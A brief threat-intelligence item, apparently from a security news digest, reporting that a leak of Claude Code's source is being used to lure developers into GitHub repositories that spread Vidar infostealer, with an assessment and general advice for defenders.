Claude Code leak used to push infostealer malware on GitHub
Summary
Threat actors are leveraging a recent leak of Claude Code's source code to distribute Vidar infostealer malware through deceptive GitHub repositories. This campaign aims to trick developers into downloading malicious code disguised as legitimate development tools.
IFF Assessment
This is bad news for defenders as it represents a new tactic by threat actors to exploit popular codebases and developer trust to distribute malware.
Defender Context
Defenders should be aware of this evolving social engineering tactic where leaked code is weaponized. Developers need to be extremely cautious when downloading code from public repositories, especially if it's related to recent leaks, and verify the legitimacy of the source before integrating it into their workflows. This highlights the need for robust endpoint detection and response (EDR) and security awareness training.